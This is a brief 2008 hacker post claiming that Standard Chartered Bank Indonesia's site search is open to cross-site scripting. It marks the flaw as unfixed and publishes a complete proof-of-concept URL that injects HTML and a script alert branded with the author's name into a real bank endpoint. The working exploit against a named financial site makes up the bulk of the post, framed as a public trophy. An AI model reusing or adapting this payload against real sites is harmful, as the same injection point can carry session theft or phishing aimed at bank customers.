Standard Chartered Bank Indonesia Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Monday, July 21st, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: standardchartered.com XSSED by SPYRO KiD}

standardchartered.com XSSED by SPYRO KiD

  • Last Checked: July 24, 2008
  • Status: UNFIXED
  • P.O.C:
http://service.standardchartered.com/gwssearch_s/scb_query.exe?method=mainQuery&numresults=100&batchhits=10&querythreshold=10%&QuerySummaryCB=querysummary&suggestquery=%3C!--ATNMY_SUGGESTQUERY--%3E&db0=gws_Indonesia&query=%3Ccenter%3E%3Ch1%3EXSSED%3C/h1%3E%3Cbr%3Eby%3Cbr%3E%3Ch2%3ESPYRO%20KiD%3Cscript%3Ealert('XSSED%20by%20SPYRO%20KiD%5Cnhttp://spyrozone.net');%3C/script%3E%3Cnoscript%3E


//E.O.F